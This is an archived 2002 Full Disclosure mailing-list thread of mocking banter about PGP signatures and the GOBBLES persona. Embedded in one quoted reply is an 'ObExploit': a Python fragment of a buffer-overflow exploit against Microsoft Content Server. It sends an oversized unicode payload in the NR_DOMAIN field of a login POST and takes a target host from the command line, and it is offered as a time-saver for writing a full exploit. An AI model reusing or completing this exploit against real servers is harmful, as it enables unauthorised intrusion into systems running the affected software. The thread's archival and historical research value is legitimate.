Full Disclosure mailing list archives
ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p
From: full-disclosure () lists netsys com (full-disclosure () lists netsys com)
Date: Wed, 14 Aug 2002 14:24:51 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 You supposed to be turkey friend turkey crew wanttobe yet you question show respect to turkey On 14 Aug 2002 17:06:11 -0400, full-disclosure () lists netsys com wrote:
At least you got the key id correct that time. It's not a valid signature, but at least it produces one less error message. -dave ObExploit: #fragment of my exploit for MS Content Server #the full exploit can be found at https://immunitysec.com/members/ #but if you're not a member, this might save you some time writing your #exploit. #returns the sploitstring def makesploit(self): header="" body="" body+="NR_DOMAIN=WinNT%3A%2F%2F" #1 alignment byte so we are word aligned with the return addr attack="" attack+="A" attack+="\x41\xb9"*4000 #unicode shellcode!! attack=stroverwrite(attack,unicodeloop,1) print "length of overflow = "+str(len(attack)) attack=urllib.quote(attack) #print attack body+=attack body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASS WORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuest Login.asp" header+="POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n" header+="Host: "+self.host+"\r\n" header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n" header+="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain ;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q =0.1\r\n" header+="Connection: keep-alive\r\n" header+="Content-Type: application/x-www-form-urlencoded\r\n" header+="Content-Length: "+str(len(body))+"\r\n" header+="\r\n" return header+body #this stuff happens. if __name__ == '__main__': print "Running Microsoft Content Server exploit v 0.1" app = mscsexploit() if len(sys.argv) < 2: print "Usage: mycontent.py target [port] [ssl=0]" sys.exit() app.setHost(sys.argv[1]) if len(sys.argv) > 2: app.setPort(int(sys.argv[2])) if len(sys.argv) > 3: app.setSSL(1) app.run() On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 or if you like On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:Gobbles, On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:GOBBLES just want to be cool whitehat like everyone else. Time fornewleaf time for six figure salary stock option naked breasted assistant.Word to that my man! ;) peace, coreYour message was signed, but the "GOBBLES" message was not and therefore just a forgery, most likely. BTW: http://www.immunitysec.com/vulnerabilities/ They arn't advisories, but if you need something to show to your boss about why you disconnected your Exchange/SQL server from the Internet, it's a good start. Dave Aitel Immunity, Inc-----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ== =xfu0 -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
-----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw 9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi =9eW6 -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
Current thread:
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p, (continued)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Jonathan Rickman (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Azerail (Aug 15)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p ssinct (Aug 15)
- SPIKE v2.5 Nicolas Couture (Aug 14)
- RE: SPIKE v2.5 Nicolas Couture (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Gary E. Miller (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Dave Aitel (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Gary E. Miller (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)